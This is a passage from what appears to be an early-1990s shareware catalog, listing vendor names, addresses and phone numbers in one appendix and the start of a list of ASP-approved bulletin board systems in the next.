BOX 246, MCALISTERVILLE PA 17049 + Phone: 717-463-3030 + + Bright Futures Inc + Address: PO BOX 1030, EAST WINDSOR CT 06088 + Phone: 203-745-5322 + + Bright Idea! Software + Address: 5339 PROSPECT ROAD, SUITE 197, SAN JOSE CA 95129 + Phone: 408-252-0542 + + Brightspark Computers & Pick-A-Disk + Address: 4 RICHARDS PLACE, NORANDA, PERTH 6062 WEST AUSTRALIA + AUSTRALIA + Phone: 011-09-375-1178 + + BroCo Software + Address: Ereprijsstraat 26, Soest Utrecht 3765 AK Netherlands + Phone: 31 2155 26650 + + Budgetware + Address: 9 ALBERMARLE STREET, NEWTOWN NSW 2042 AUSTRALIA + Phone: 011-612-519-4233 + + Bureau of Electronic Publishing + Address: 141 NEW ROAD, PARSIPPANY NJ 07054 + Phone: 201-808-2700 + + Bytes and Nibbles + Address: PO BOX 2275, DUNEDIN OTAGO 9001 NEW ZEALAND + Phone: 03-455-3669 + + Bytesaver Software + Address: 1087 CANTERFORD CIRCLE, WESTLAKE VILLAGE CA 91361 + Phone: 805-496-7164 + + Camouflage-Soft + Address: Postfach/POB 761, Sittersweg 85, W-6600 Saarbrucken + GERMANY + Phone: 49/0681/4170330 + + Capitol Computer Consulting + Address: 741 EAST ST SUITE 349, WOODLAND CA 95695 + Phone: 916-661-8181 + + CDV - NEWSOFT + Address: Ettlinger Str. 5, 7500 Karlsruhe 1 GERMANY + Phone: 0721-22295 + + CELESTIAL PRESS/SOFTWARE + Address: 4424 DOHRCREST DRIVE, NEW PORT RICHEY FL 34652 + Phone: 813-845-8522 or + + Appendix B, "Vendor addresses" 474 + + + + Ceramics & Crafts by Marjorie + Address: PO BOX 424, MORGAN HILL CA 95038 + Phone: 408-683-2240 + + ComLine + Address: 233 W MAIN ST, APOPKA FL 32703 + Phone: 407-884-5732 + + CompuSoft + Address: 6209 15TH AVE NW, SEATTLE WA 98107 + Phone: 206-784-8140 + + Compustuff + Address: 2759 MEDINA RD, PO BOX 58317, MEDINA OH 44258 + Phone: 216-725-7729 + + Computer Bin + Address: PO Box 1826, Perris CA 92571 + Phone: 714-943-7899 + + Computer Bug + Address: 849 IRWIN DRIVE, PITTSBURGH PA 15236 + Phone: 412-882-3374 + + Computer Hut + Address: 1825-F1 TAMIAMI TRAIL, PORT CHARLOTTE FL 33948 + Phone: 813-624-2123 + + Computer Library of New Zealand Ltd. + Address: R.D.3, TIMARU NEW ZEALAND + Phone: +64-3-615-9333 + + Computer Solutions + Address: 181B ROUTE 37, NEW FAIRFIELD CT 06812 + Phone: 203-746-6372 + + Computer Solutions Software Gm + Address: Gartenstr. 2, W-8010 Grafing, F.R.G Bavaria + + Computers International + Address: PO BOX 566085, OCEANSIDE CA 92058 + Phone: 619-630-0055 + + Crazy Horse Software + Address: 1247 SECOND ST. WEST, CORNWALL ONT K6J 1J2 CANADA + Phone: 613-932-6343 + + Cross Country Shareware + Address: 340 EDINBURGH ROAD NORTH, GUELPH ONTARIO N1H 7Y4 + CANADA + Phone: 519-837-0777 + + Appendix B, "Vendor addresses" 475 + + + + CWI Information Services + Address: PO Box 4851, Anaheim CA 92803 + Phone: 714-879-7917 + + D-K Distributing + Address: 1057 W PHILADELPHIA #243, ONTARIO CA 91762 + Phone: 714-590-1038 + + Data Outlet Shareware + Address: PO Box 776, Macon GA 31202-0776 + Phone: 912-743-3732 + + Data-Vision + Address: 795 HAMMOND DR. #1104, ATLANTA GA 30328 + Phone: 404-851-0107 + + DataProjects Heidel + Address: Im Huferfeld 5, Dusseldorf 4000 GERMANY + Phone: 211 4180700 + + DBLinx + Address: 1117 MANCHESTER DR., CARY NC 27511 + Phone: 919-469-5196 + + Die Deutsche Software Biblioth + Address: ALPENSTRASSE 52, 8038 GROEBENZELL WEST GERMANY + + Dinastindo Software + Address: J1. Tanjung Duren Raya 23, Jakarta Barat 11470 + INDONESIA + Phone: 0062-21 5668702 + + Dinsdale Industries + Address: 2032 MERIVALE ROAD, NEPEAN ONT K2G 1G6 CANADA + Phone: 613-723-9532 + + Discovery Software + Address: PO BOX 1056, ATTLEBORO MA 02703-0891 + Phone: 508-226-5541 + + Disk Park + Address: 23 EAGLE DRIVE, FLITWICK BEDFORD MK45 1RH ENGLAND + Phone: 44-525-713358 + + Distant Markets Exports, Import Ltd. + Address: 6520-105 ST, EDMONTON ALBERTA T6H 2N7 CANADA + Phone: 403-436-3009 + + DKR Software + Address: 9 RAYMOND GROVE, WARRADALE SA 5046 AUSTRALIA + Phone: 377-0049 + + Appendix B, "Vendor addresses" 476 + + + + Domainsoft + Address: 244 BANK STREET, SOUTH MELBOURNE VICTORIA 3205 + AUSTRALIA + Phone: 61 3 699 8223 + + Donnux Shareware + Address: PO BOX 410, MILFORD VA 22514 + Phone: 804-633-4515 OR 4615 + + DP Tool Club + Address: 102 RUE DES FUSILLES, VILLENEUVE D'ASCQ F-59493 FRANCE + Phone: 33-2084-5533 + + Droege Computing Services, Inc. + Address: 3200 CROASDAILE DR., SUITE 304, DURHAM NC 27705 + Phone: 919-383-9749 + + E-Z Software Emporium + Address: 1211 COVENTRY LANE, MURFREESBORO TN 37129 + Phone: 615-895-8934 + + Econo-ware Nederland + Address: Hoffmannlaan 519, Tilburg NB 5011 WK NETERLANDS + Phone: 31 13 563779 + + ElectronArt Design Ltd.(Pocketware) + Address: 78 KIMBERLEY AVENUE, ILFORD ESSEX IG2 7AS ENGLAND + Phone: 081-983-8686 + + Elite Management + Address: 5 MAYFLOWER CRESCENT, HALLETT COVE 5158 SOUTH + AUSTRALIA AUSTRALIA + Phone: 8-381-4851 + + Encode Business Systems Inc + Address: 434 WEST ST NORTH, ORILLIA ONT L3V 5E8 CANADA + Phone: 705-327-7628 + + Estudio Shareware + Address: RIOBAMBA 436 PISO 3 of 5, CAPITAL FEDERAL 1025 + ARGENTINA + Phone: 541-583-1570 + + Executive Software Inc. + Address: 32 ESTELLA AVE, PITTSBURGH PA 15211 + Phone: 412-481-9792 + + EZ-Ware + Address: 1832 WOODLAWN DRIVE, MEDFORD OR 97504-7653 + Phone: 503-779-5286 + + EZPCware + Address: 5525 GIBSON ROAD, SUITE 101, GIBSONIA PA 15044 + Phone: 412-443-0366 + + Appendix B, "Vendor addresses" 477 + + + + Falsoft Inc - Software Shopper + Address: 9509 US HIGHWAY 42, PROSPECT KY 40059 + Phone: 502-228-4492 + + FamilyWare + Address: 2306 CARROLL GROVE DRIVE, TAMPA FL 33612 + Phone: 813-933-8836 + + Finto Software + Address: RT 2, BOX 44, ROSEBUD TX 76570 + Phone: 817-583-2151 + + Flagg's Floppy + Address: 26929 TALL OAKS TRAIL, OLMSTED TOWNSHIP OH 44138 + Phone: 216-235-9407 + + Forest Park Software + Address: 1527 S MARENGO AVE, FOREST PARK IL 60130-2623 + Phone: 708-366-0705 + + Fox Valley Technical College + Address: 1825 N BLUEMOUND DRIVE, APPLETON WI 54913 + Phone: 414 735 2470 + + Fred's Favourites + Address: PO BOX 2542, DARTMOUTH NOVA SCOTIA B2W 4B7 CANADA + Phone: 902-462-4453 + + Fred's Software + Address: 14220 66TH STREET N, CLEARWATER FL 34624 + Phone: 813-539-8357 + + Gaan Computer Supplies + Address: 499 SALMAR AVE, SUITE G, CAMPBELL CA 95008 + Phone: 408-370-6747 + + Gemini Marketing Inc + Address: PO BOX 640, DUVALL WA 98019 + Phone: 206-788-4295 + + Generic Computer Systems + Address: 22612 FOOTHILL BLVD STE 200-C, HAYWARD CA 94541 + Phone: 415-581-1494 + + Generic Software Place Inc + Address: PO BOX 1177, CARMEL IN 46032 + Phone: 317-846-8474 + + GF Stores Ltd + Address: RR #1, Davis Bay Road/11, Sechelt BC V0N 3A0 CANADA + Phone: 604-885-5025 + + Appendix B, "Vendor addresses" 478 + + + + GK Enterprises + Address: 8634 W NATIONAL AVENUE, WEST ALLIS WI 53227 + Phone: 414-546-0111 + + Goodman Enterprises + Address: 16 CONRAD CLOSE, STAFFORDSHIRE ST3 1SW ENGLAND + Phone: 0782 335650 + + Graematter + Address: PO BOX 874, GREENVILLE TX 75403 + Phone: 903-454-3366 + + House Of Barlow + Address: 6612 S.KISSIMMEE STREET, TAMPA FL 33616 + Phone: 813-837-9250 + + HRS Software Inc. + Address: 145 ROYAL CREST COURT, UNIT 41, MARKHAM ONTARIO L3R + 9Z4 CANADA + Phone: 416-470-7669 + + Husco Austria Handelsgesellshcaft m.b.H. + Address: Bosendorferstrasse 4, VIENNA 1010 Wien AUSTRIA + Phone: 431/505 43 11 + + Hyper.doc Business Information Systems + Address: 9119 SKINNER ROAD, FREDONIA NY 14063 + Phone: 716-672-4254 + + HYTech Inc. + Address: PO BOX 805, DEARBORN MI 48226 + Phone: 313-837-1796 + + Image Maker Software + Address: PO BOX 626, HOBART IN 46342-7044 + Phone: 219-942-2220 + + Infinity Data Products + Address: PO BOX 533, JACKSON MO 63755 + Phone: 314-243-8483 + + InfoQuest + Address: ROUTE 1, BOX 157, CARBONDALE IL 62901-9702 + Phone: 618-549-3414 + + Intelligent Resources Corp + Address: 3386 STATE ROAD 584, SUITE 301, PALM HARBOR FL 34684 + Phone: 813-785-0614 + + International Market, MCCA + Address: PO BOX 41, MADISONVILLE TX 77864-041 + Phone: 409-348-6963 + + Appendix B, "Vendor addresses" 479 + + + + IZAK Computer Marketing Co + Address: PO BOX 5476, HILO HI 96720 + Phone: 808-935-1273 + + Jamtec + Address: UNIT 21, 27 RICKARD ROAD BANKSTOWN, SYDNEY NSW 2200 + AUSTRALIA + Phone: 61 2 7072924 + + Jim Thompson Enterprises + Address: 150 S Magnolia Avenue Ste #248, Anaheim CA 92804 + Phone: 714-821-5090 + + JY SOFTWARE + Address: PO BOX 6736, ELIZABETH NJ 07206 + Phone: 908-820-0565 + + Kamloops Computer Software + Address: 357 ROBSON DRIVE, KAMLOOPS BC V2E 1W2 CANADA + Phone: 374-3475 + + Kencordall Computers + Address: 5111 NEW STREET, BURLINGTON ONTARIO L7L 1V2 CANADA + Phone: 416-333-0444 + + Key Systems, Inc. + Address: 575 CALDWELL BLVD, NIAMPA ID 83651 + Phone: 208-466-6645 + + Khan's Software + Address: 36 JUDITH CRES, BRAMPTON ONT L6S 3J4 CANADA + Phone: 416-458-7360 + + Knightec + Address: 35 ROBB BLVD. #6, ORANGEVILLE ONT L9W 3L1 CANADA + Phone: 519-942-0624 + + Logicom + Address: 5180 LE HAURE, TROIS-RIVIERES-QUEST QUEBEC G8Y 5Y9 + CANADA + Phone: 819-378-5013 + + Low Price Software + Address: 6307 BRIAR TERRACE, HOUSTON TX 77072 + Phone: 713-933-5409 + + M J McLeod Shareware Service + Address: 16 PRUDENCE CLOSE, WHITEBRIDGE NSW 2290 AUSTRALIA + Phone: 61 49 422873 + + Manaccom Pty Ltd + Address: 9 CAMFORD STREET, MILTON 4064 QLD AUSTRALIA + Phone: 617-368-2366 + + Appendix B, "Vendor addresses" 480 + + + + Maple Informatica Ltda. + Address: 8 CAINES AVE, WILLOWDALE ONT M2M 1G2 CANADA + Phone: 55-11-826-4849 + + Marc Routhier Co + Address: 3431, DE LA DAUVERSIERE, SAINTE-FOY QUE G1X 2H6 CANADA + Phone: 418-653-3705 + + Masled Informatica + Address: Via Dei Pioppi,9-04011 APRILIA (LT), APRILIA LATINA + 04011 ITALY + Phone: 39 6 9271733 + + MAXIMUM Share + Address: 13337 E SOUTH ST, CERRITOS CA 90701 + Phone: 310-402-1909 + + MediaLand, Inc. + Address: 151 SLATER STREET, SUITE 100, OTTAWA ONT K1P 5H3 + CANADA + Phone: 613-736-6954 + + Meg-A-Byte PC Software Supply + Address: 8110 W. COLFAX AVE, LAKEWOOD CO 80215 + Phone: 303-239-9224 + + MegaByte(Shareware) U.K. + Address: 90 CAMERON WAY, KNIGHTSRIDGE, LIVINGSTON WEST LOTHIAN + EH54 8HF SCOTLAND UK + Phone: 0506 441384 + + Micro Star + Address: 1945 CAMINO VIDA ROBLE, CARLSBAD CA 92008 + Phone: 619-931-4949 + + Micro Technology + Address: 21 VINTAGE DRIVE, E WINDSOR NJ 08520 + Phone: 609-426-0465 + + Microforum Mfg Inc + Address: 1 WOODBOROUGH AVE, TORONTO ONT M6M 5A1 CANADA + Phone: 416-656-6406 + + MicroPower Software + Address: 6928 W ELMHURST AVE, LITTLETON CO 80162 + Phone: 303-973-5141 + + Midwest Software Library + Address: PO BOX 6184, GRAND FORKS ND 58206-6184 + Phone: 800-333-7614 + + Mile High Software + Address: 5149 WEST 69TH PL., WESTMINSTER CO 80030-5700 + Phone: 303-426-0465 + + Appendix B, "Vendor addresses" 481 + + + + Miller's Computers + Address: PO BOX 1022, MCMURRAY PA 15317 + Phone: 310-866-9801 + + Mitchell Disk Software Library + Address: PO Box 5096, Bradford MA 01835-0096 + Phone: 508-372-1779 + + Mom and Pop's Software + Address: 4205 MARINER BLVD, SUITE 169, SPRING HILL FL 34609 + Phone: 904-688-9108 + + Moran Communications + Address: PO BOX 608, LUCEDALE MS 39452-0608 + Phone: 601-947-7024 + + Moresoft Data + Address: FROVAGEN 14, VAXJO 352 41 SWEDEN + Phone: 0470-112 85 + + Most Significant Bits + Address: 13733-B MADISON AVE, LAKEWOOD OH 44107 + Phone: 216-221-9836 + + Mr Disk Software + Address: 5915 CASEY DRIVE, KNOXVILLE TN 37909 + Phone: 615-584-3952 + + National Software + Address: 2062 MERCHANTS GATE, PO BOX 76023, OAKVILLE ONT L6M + 2Z8 CANADA + Phone: 416-847-3484 + + NB-data + Address: DANMARKSGADE 16, DK-4874 GEDSER DENMARK + Phone: 53 87 99 75 + + NBG Computer & PD Service + Address: Von Auer Str. 19, GEISLING W-8401 GERMANY + Phone: 09481 1481 + + Next Stop Computing + Address: PO Box 819, San Carlos CA 94070 + Phone: 415-592-6735 + + Night Owls Computer Service + Address: 219 POTOMAC AVE, BUFFALO NY 14213 + Phone: 716-886-2726 + + Noad Software + Address: 915 BLVD AVE, PO BOX 701, AVIS PA 17721 + Phone: 717-753-3792 + + Appendix B, "Vendor addresses" 482 + + + + North London Shareware + Address: 188 OSIDGE LANE, SOUTHGATE LONDON N14 5DR ENGLAND + Phone: 044-081-361-9811 + + NovaWare, Inc. + Address: 7477 STANFORD, ST LOUIS MO 63130 + Phone: 314-862-5123 + + Novel Solutions + Address: 921 NORTHWOOD, WILLIAMSVILLE NY 14221 + Phone: 716-632-2365 + + OFFShore Software, Inc. + Address: 2941 PRETTY BRANCH DR. W., MOBILE AL 36618 + Phone: 205-649-9415 + + Omicron Systems Ltd. + Address: 45, BLENHEIM CRESCENT, LEIGH-ON-SEA ESSEX SS9 3DT + ENGLAND + Phone: 0702-710391 + + Ordinateurs Utilisateurs France (OUF) + Address: 27 Rue des Bluets, PARIS 75011 FRANCE + Phone: 33-1 4338-0258 + + P.D. (& SHAREWARE) SOFTWARE LIBRARY + Address: WINSCOMBE HOUSE, BEACON RD, CROWBOROUGH SUSSEX TN6 + 1UL ENGLAND + Phone: 0892-663298 + + Passware Systems Ltd + Address: 175 GEORGIAN WAY, SHERWOOD PARK ALBERTA T8A 2W7 CANADA + Phone: 403-464-5660 + + PC Arcade + Address: 14 MORELAND AVE, OAKVILLE CT 06779 + Phone: 203-798-3318 + + PC Assist Ltd. + Address: 33 PORTLAND ST, EDINBURGH EH6 4BB SCOTLAND + Phone: 031-554-5460 + + PC Independent User Group + Address: 87 HIGH STREET, TONBRIDGE KENT TN9 1RX ENGLAND + Phone: 0732-771512 + + PC Productivity, Inc. + Address: 5777 RIVERSIDE DR, CAPE CORAL FL 33904 + Phone: 813-542-6711 X402 + + PC Shareware + Address: 1763 GARNET AVE, SAN DIEGO CA 92109 + Phone: 619-272-6673 + + Appendix B, "Vendor addresses" 483 + + + + PC Shareware Limited + Address: CRANLEIGH HOUSE, KEMBERTON, SHIFNAL TF11 9LY ENGLAND + Phone: 952-585348 + + PC Software & Supply + Address: RT 1, BOX 219H, SOUTH SIOUX CITY NE 68776 + Phone: 402-494-7133 + + PC Software Depot + Address: 965 E. 830 S, PLEASANT GROVE UT 84062 + Phone: 801-785-9507 + + PC-SIG + Address: 1030D East Duane Ave, Sunnyvale CA 94086 + Phone: 408-730-9291 + + PCDisk + Address: PO BOX 10627, KILLEEN TX 76547-0627 + Phone: 817-526-2383 + + PD Software Services P/L + Address: 8 BENTLEY ST, WANTIRNA 3152 AUSTRALIA + Phone: 03-729-9534 + + PD-Service Lage + Address: Friedrich str.29, D-4937 Lage/Lippe WEST GERMANY + Phone: 49-5232-66912 + + PeakSoft + Address: 3 GOLF CENTER, SUITE 231, HOFFMAN ESTATES IL 60195 + Phone: 708-843-1225 + + Pearl Agency + Address: W-7845 Am Kalischacht 4, Bugginger W-7845 GERMANY + Phone: 011-49-7631-4042/4043 + + Pendragon Software Library + Address: 75 MEADOWBROOK ROAD, EAST GREENWICH RI 02818 + Phone: 401-884-6825 + + Peninsula Books, Inc + Address: 3612 NW 97TH BLVD, GAINESVILLE FL 32606 + Phone: 904-332-1009 + + People's Choice + Address: 235 GERMANTOWN BEND CV. # 1, CORDOVA TN 38018-7238 + Phone: 901-753-0148 + + Peoples Software Co. + Address: 85 SOUTH WASHINGTON ST, SEATTLE WA 98104 + Phone: 206-622-6469 + + Appendix B, "Vendor addresses" 484 + + + + Performance Shareware, Inc. + Address: 627 TOPSAIL ROAD, ST JOHNS NEWFOUNDLAND A1E 2E1 CANADA + Phone: 709-368-5022 + + Pik A Program + Address: 13 ST. MARKS PLACE, NEW YORK NY 10003 + Phone: 212-598-4459 + + Power PC, Inc. + Address: 2650 LA CIENEGA AVE, LOS ANGELES CA 90034 + Phone: 310-836-0338 + + Power User + Address: 3021 HOLLAND ST, ERIE PA 16504 + Phone: 814-454-0234 + + Prairieware + Address: 3101 1ST AVENUE N/PO BOX 265, GREAT FALLS MT 59401 + Phone: 406-727-4675 + + Printers Shareware + Address: 5019-5021 West Lovers Lane, Dallas TX 75209 + Phone: 214-350-1902 + + Pro-Line Software + Address: PO BOX 2416, CLIFTON NJ 07015 + Phone: 201-772-1993 + + Public (software) Library + Address: PO BOX 35705, HOUSTON TX 77235-5705 + Phone: 713-721-5205 + + Public Brand Software + Address: 3750 Kentucky Avenue, Indianapolis IN 46241 + Phone: 317-856-1485 + + Public Domain Users Group + Address: 1263 GROVE PARK DRIVE, ORANGE PARK FL 32073 + Phone: 904-264-3512 + + Rainbow Avenue Software + Address: 380 CAMINO DE ESTRELLA, SAN CLEMENTE CA 92672 + Phone: 714-366-3783 + + Rainbow Software + Address: PO Box 3908, Ontario CA 91761 + + Reasonable Solutions, Inc + Address: 2101 WEST MAIN STREET, MEDFORD OR 97501 + Phone: 503-776-5777 + + Redstone Mountain Software Inc. + Address: 758 PONDEROSA DRIVE, EVERGREEN CO 80439 + Phone: 303-674-0176 + + Appendix B, "Vendor addresses" 485 + + + + Remington Business Systems, Inc. + Address: 14928 DOGWOOD, ORLAND PARK IL 60462 + Phone: 708-403-8010 + + Romy Informa Tech + Address: 301 E. SECOND ST, FARMVILLE VA 23901 + Phone: 804-392-8784 + + S+W. Scheffel + Address: Schillerstr. 95, Berlin - 12 D-1000 GERMANY + Phone: 49 30 312 4455 + + SAS Software + Address: PO BOX 375 STATION "B", HOWARD BEACH NY 11414 + Phone: 718-848-0301 + + SaturnSoft, Ltd + Address: 701 FRANKLIN SQ. BOX 328, MICHIGAN CITY IN 46360 + Phone: 219-874-6398 + + Seltec Shareware Library + Address: PO BOX 641, 101/29 NEWLAND ST, BONDI JUNCTION NSW 2022 + AUSTRALIA + Phone: (2)369-2292 + + Shareable Software International, Inc. + Address: PO BOX 59102, SCHAUMBURG IL 60159 + Phone: 708-397-1221 + + Sharesoft + Address: AZCUENAGA 1061-4to. Piso Depto. 18, BUENOS AIRES + CAPITAL FEDERAL C.P. 1115 ARGENTINA + + Shareware & More + Address: 60 BROADWAY, SHELBY OH 44875 + Phone: 419-347-4065 + + Shareware America Marketing Co. + Address: 724 WEST MAIN STREET, SALEM IL 62881 + Phone: 618-323-6279 + + Shareware Depot + Address: 12261 SW 132 CT, MIAMI FL 33186 + Phone: 305-378-9282 + + Shareware Distribution Center + Address: 13741 FOOTHILL BLVD., SUITE 170, SYLMAR CA 91342 + Phone: 818-367-5020 + + Shareware Express + Address: 1662 SISKIYOU BOULEVARD, ASHLAND OR 97520 + Phone: 503-482-5136 + + Appendix B, "Vendor addresses" 486 + + + + Shareware Systems + Address: 72 CASCADE DRIVE, #36 BUILDING 2 LEVEL 2, ROCHESTER NY + 14614 + Phone: 716-663-4229 + + Shareware Testing Laboratories + Address: PO BOX 11499, INDIANAPOLIS IN 46201-0499 + Phone: 317-352-0021x5550 + + Shareware To Go + Address: PO BOX 574575, ORLANDO FL 32857-4575 + Phone: 407-679-5159 + + Shareware Today + Address: PO BOX 291, 106 LYNN COVE, BROOKLAND AR 72417 + Phone: 501-932-9035 + + Shareware-Elite + Address: 25 CADES PARK, HELSTON CORNWALL TR13 8QS ENGLAND + Phone: 0326-564164 + + Sim-Com Services + Address: 35158 High Drive, Abbotsford BC V2S 4P6 Canada + Phone: 604-854-DISK + + Simple Series + Address: PO BOX 1167, PLAISTOW NH 03865 + Phone: 603-893-8553 + + Simply Software + Address: 2989 SARLETTO STREET, NORTH PORT FL 34287 + Phone: 813-426-2568 + + Skip's Shareware Selections + Address: 3516 WOLFE CRES. APT 4, HALIFAX NOVA SCOTIA B3L 3S2 + CANADA + Phone: 902-453-0308 + + SMM Softwarevertrieb & Beratung + Address: Hermann-Lons-Str. 12, 6501 BUDENHEIM GERMANY + Phone: 01149 6139 5813 + + SMS Shareware + Address: 19 CARSHALTON ROAD, CAMBERLEY SURREY GU15 4AQ UK + Phone: 44 276 681864 + + Sofsource/Digital By Design + Address: PO BOX 1092, EAST LANSING MI 48826 + Phone: 517-349-3564 + + Soft Consult GmbH + Address: MARKTPLATZ 2, 6277 BAD CAMBERG GERMANY + Phone: 0049-6434-3399 + + Appendix B, "Vendor addresses" 487 + + + + Softcell Services + Address: 25 MAYWOOD, BRYNNA PONTYCLUN MID GLAMORGAN CF7 9PZ + ENGLAND + Phone: 0443 2386930 + + Softshoppe + Address: PO BOX 3678, ANN ARBOR MI 48106-3678 + Phone: 313-763-8721 + + Softville Computer Supplies + Address: UNIT 5 STRATFIELD PK, ELETTRA AVE, WATERLOOVILLE + HAMPSHIRE P07 7XN ENGLAND + Phone: 0705-266509 + + Software Excitement! + Address: 6475 CRATER LAKE HWY, Central Point OR 97502 + Phone: 503-826-8086 + + Software Express + Address: 1090 ROCK ROAD COURT SUITE 12, EAST DUNDEE IL 60118 + Phone: 708-426-0077 + + Software Select + Address: 204 GLADSTONE, BLUE SPRINGS MO 64014 + Phone: 816-228-4595 + + Software Shoppe Ltd + Address: PO Box 6328, CHELSEA MA 02150 + Phone: 508-772-7909 + + Software Source, Inc. + Address: 165 CRISTICH LANE UNIT C, CAMPBELL CA 95008 + Phone: 800-443-3475 + + Software Stop + Address: 5211 GRAND BLVD, WINDSOR ONT N8T 1M2 CANADA + Phone: 519-974-6731 + + Solomon Seven Software + Address: 9300 8TH STREET, DAWSON CREEK BC V1G 3N6 CANADA + Phone: 604-782-4205 + + Southern Data + Address: PO BOX 8926, PEMBROKE PINES FL 33084 + Phone: 305-963-0587 + + Spartan Software Marketing + Address: 4418 PARRIS BRIDGE RD, SPARTANBURG SC 29303 + Phone: 803-574-0437 + + Spearwood Shareware Service + Address: 22 Sitwell Close, Spearwood WEST AUSTRALIA 6163 + AUSTRALIA + Phone: 011 61 94185721 + + Appendix B, "Vendor addresses" 488 + + + + Sunshine Shareware + Address: 1630 SOUTH DIAMOND SUITE B, SANTA ANA CA 92704 + Phone: 714-754-4577 + + Sunshine Software + Address: 6492 SOUTH ST. #470, LAKEWOOD CA 90713 + Phone: 310-866-9801 + + Svenska PC Klubben + Address: PO BOX 30069, GOTHENBURG S-40043 SWEDEN + Phone: 46-31-475101 + + T.E.C. Systems + Address: PO BOX 96058, AUCKLAND 1004 NEW ZEALAND + Phone: 9-603-491 + + that Disk company + Address: PO BOX 634, GLEN ELLYN IL 60138-0634 + Phone: 708-858-8357 + + The $5 Computer Software Store + Address: 951 CALLE NEGIOCIO, SAN CLEMENTE CA 92672 + Phone: 714-366-8777 + + The Computer Store + Address: PO BOX 923, LONGVIEW WA 98632 + Phone: 206-425-2682 + + The Datapak Library + Address: 1226 S PLAZA, SPRINGFIELD MO 65804 + Phone: 417-881-4483 + + the Digital Publishing Company + Address: 12220 RIVERWOOD DRIVE, BURNSVILLE MN 55337 + Phone: 612-595-0801 + + The Generic Software Place + Address: 5491 W. 88TH AVE. STE 113-B, WESTMINSTER CO 80033-3002 + Phone: 303-427-3621 + + The Hi-Tech Marketplace + Address: 3 VERNON STREET, PARLIN NJ 08859 + Phone: 908-525-2581 + + The PC Exchange + Address: 2550 STAG RUN BLVD. #438, CLEARWATER FL 34625 + Phone: 813-799-6971 + + The Shareware Club, Inc. + Address: 217 FIRST AVE SE, PO BOX 1750, DUVALL WA 98019-1750 + Phone: 206-788-7424 + + Appendix B, "Vendor addresses" 489 + + + + The Software Labs + Address: 3767 OVERLAND AVE. #112, LOS ANGELES CA 90034 + Phone: 213-559-5456 + + The Software Peddler + Address: 9941 PINES BLVD, PEMBROKE PINES FL 33024 + Phone: 305-436-6732 + + Toff-Soft PD & Shareware Service + Address: Gartenstr. 20, D-4500 Osnabruck D-W-4500 GERMANY + Phone: 0541-597369 + + TRAX + Address: STEENSTRAAT 61, ZEDELGEM BELGIUM 8211 EUROPE + Phone: 32-50-20-07-35 + + Treasure Chest Software + Address: 5010 PECAN DR, SHELBY NC 28150 + Phone: 704-487-8447 + + Trilogy International + Address: 20826 BEACONSFIELD, ST CLAIR SHORES MI 48080 + Phone: 313-885-5065 + + Two Guys Systems & Software + Address: 1684 DECOTO ROAD SUITE 202, UNION CITY CA 94587 + Phone: 510-796-5452 + + Ultimate Data Technology + Address: 7751 HICKORY LANE, FINDLAY OH 45840 + Phone: 419-423-3920 + + Unipub Technologies + Address: 4/F, Flat A, Hoi On Building, 92-98 Sai Wan Ho Street, + Shaukiwan, HONG KONG HONG KONG + Phone: 852-571-5196 + + ValueWare + Address: 400 MIDSHIPMAN ROAD, KNOXVILLE TN 37922 + Phone: 615-675-7958 + + Vasstec Ltd + Address: 1485 DUMBARTON ROAD, GLASGOW G14 9XL SCOTLAND + Phone: 011-41-954-6853 + + Venus Electronics Shareware + Address: 26 PEVENSEY WAY FRIMLEY GREEN, CAMBERLEY SURREY GU16 + 5YJ ENGLAND + Phone: 0252 837860 + + Vision Shareware + Address: 24 FLINDERS AVE, COLONEL LIGHT GDNS SOUTH AUSTRALIA + 5041 AUSTRALIA + Phone: 61 8 277 0069 + + Appendix B, "Vendor addresses" 490 + + + + Vista Photographic L&P, Inc. + Address: 95-106 HUAALA PL, MILILANI HI 96789 + Phone: 808-625-7512 + + Whitecat Software + Address: 1958 37TH AVE., VERO BEACH FL 32960 + Phone: 407-569-6634 + + Wilkes & Son + Address: BUNBURY, TARPORLEY, CHESHIRE CW6 9PE UK + Phone: 0829 260775 + + Winners Edge Computer Software + Address: 3531 W 5000 S, ROY UT 84067 + Phone: 801-825-4229 + + Words and Worms + Address: 19748 COLLINS RD, SANTA CLARITA CA 91351 + Phone: 805-252-8209 + + Z-Products + Address: PO BOX 34339, BALTIMORE MD 21221-1739 + Phone: 410-686-5908 + + Ziff Communications + Address: 25 FIRST STREET, CAMBRIDGE MA 02142 + Phone: 617-252-5255 + + Zillesoft GmbH + Address: Neuot Wall 2-4, D-4130 Moets 1 West Germany + Phone: 02841-28049 + + Appendix C, "Bulletin Boards" 491 + + + + + + Appendix C + Bulletin Boards + + This appendix lists each ASP-approved computer bulletin board + system (BBS). These BBSs have agreed to abide by ethical stan- + dards when offering shareware. + + Set your communications software to "8 data bits, no parity, 1 + stop bit" before calling any of these BBSs. + + + "YA! WEBECAD!" + Address: 556 E PARKLAND AVE, EVANSVILLE IN 47711 + BBS Phone: 812-428-3870 + + **CCAT** + Address: 11326 DEW CREEK CIRCLE, CORPUS CHRISTI TX 78410 + BBS Phone: 512-242-2206 + th + 24 Street Exchange + Address: PO BOX 188263, SACRAMENTO CA 95818-8263 + BBS Phone: 916-454-2992 + + < + Address: 4660 WHITAKER PL, DALE CITY VA 22193-3011 + BBS Phone: 703-680-9269 + + The Byzantine Empire BBS + Address: 1109 MANSON ST, WAUSAU WI 54401 + BBS Phone: 715-848-2833 + + The CAD BBS + Address: 29312 APPLEWOOD COURT, SAN JUAN CAPISTRANO CA 92675 + BBS Phone: 714-364-1633 + + The Cheshire Cat + Address: PO BOX 3701, ZEPHYR COVE NV 89449 + BBS Phone: 916-542-3088 + + The Circuit Board + Address: 1112 BALMORA DRIVE, LAFAYETTE CO 80026 + BBS Phone: 303-666-0302 + + THE COLLECTOR'S FORUM + Address: 4153 N BONITA ST, SPRING VALLEY CA 91977 + BBS Phone: 619-463-9222 + + Appendix C, "Bulletin Boards" 503 + + + + The Collectors' BBS + Address: PO BOX 861, CHATHAM NJ 07928 + BBS Phone: 201-635-4519 + + The Comm-Post + Address: 540 ACOMA STREET, DENVER CO 80204 + BBS Phone: 303-534-4646 + + The Computer Station BBS + Address: 1960 KAPIOLANI STE 113-388, HONOLULU HI 96826 + BBS Phone: 808-247-7328 + + THE CONSULTANT BBS + Address: JAF PO BOX 8571, NEW YORK NY 10116 + BBS Phone: 718-837-3236 + + The CrossRoads BBS + Address: 1309 WEST ALBION AVENUE, CHICAGO IL 60626 + BBS Phone: 312-743-5439 + + The ELUSIVE DIAMOND + Address: 9922 COFFER WOODS RD, BURKE VA 22015 + BBS Phone: 703-323-6423 + + The Evans BBS + Address: 302 EAST COFFREN AVE, GREENVILLE MI 